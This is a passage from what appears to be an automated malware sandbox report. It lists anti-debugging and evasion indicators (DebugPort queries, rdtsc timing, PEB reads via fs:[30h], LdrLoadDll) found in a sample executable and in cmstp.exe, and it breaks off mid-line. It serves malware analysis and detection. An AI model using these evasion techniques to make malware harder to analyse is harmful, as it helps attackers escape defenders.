          Source: C:\Windows\SysWOW64\cmstp.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\20210113432.exe; Code function: 2_2_00409A80 rdtsc (2_2_00409A80)
          Source: C:\Users\user\Desktop\20210113432.exe; Code function: 2_2_0040ACC0 LdrLoadDll (2_2_0040ACC0)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_0491849B mov eax, dword ptr fs:[00000030h] (10_2_0491849B)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_04909080 mov eax, dword ptr fs:[00000030h] (10_2_04909080)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_04983884 mov eax, dword ptr fs:[00000030h] (10_2_04983884, 2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_0493F0BF mov ecx, dword ptr fs:[00000030h] (10_2_0493F0BF)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_0493F0BF mov eax, dword ptr fs:[00000030h] (10_2_0493F0BF, 2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049320A0 mov eax, dword ptr fs:[00000030h] (10_2_049320A0, 6 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049490AF mov eax, dword ptr fs:[00000030h] (10_2_049490AF)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h] (10_2_0499B8D0)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_0499B8D0 mov ecx, dword ptr fs:[00000030h] (10_2_0499B8D0)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_0499B8D0 mov eax, dword ptr fs:[00000030h] (10_2_0499B8D0, 4 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049D8CD6 mov eax, dword ptr fs:[00000030h] (10_2_049D8CD6)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049C14FB mov eax, dword ptr fs:[00000030h] (10_2_049C14FB)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_04986CF0 mov eax, dword ptr fs:[00000030h] (10_2_04986CF0, 3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049058EC mov eax, dword ptr fs:[00000030h] (10_2_049058EC)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049D4015 mov eax, dword ptr fs:[00000030h] (10_2_049D4015, 2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_04987016 mov eax, dword ptr fs:[00000030h] (10_2_04987016, 3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049D740D mov eax, dword ptr fs:[00000030h] (10_2_049D740D, 3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_04986C0A mov eax, dword ptr fs:[00000030h] (10_2_04986C0A, 4 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049C1C06 mov eax, dword ptr fs:[00000030h] (10_2_049C1C06, 7 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 10_2_049C1C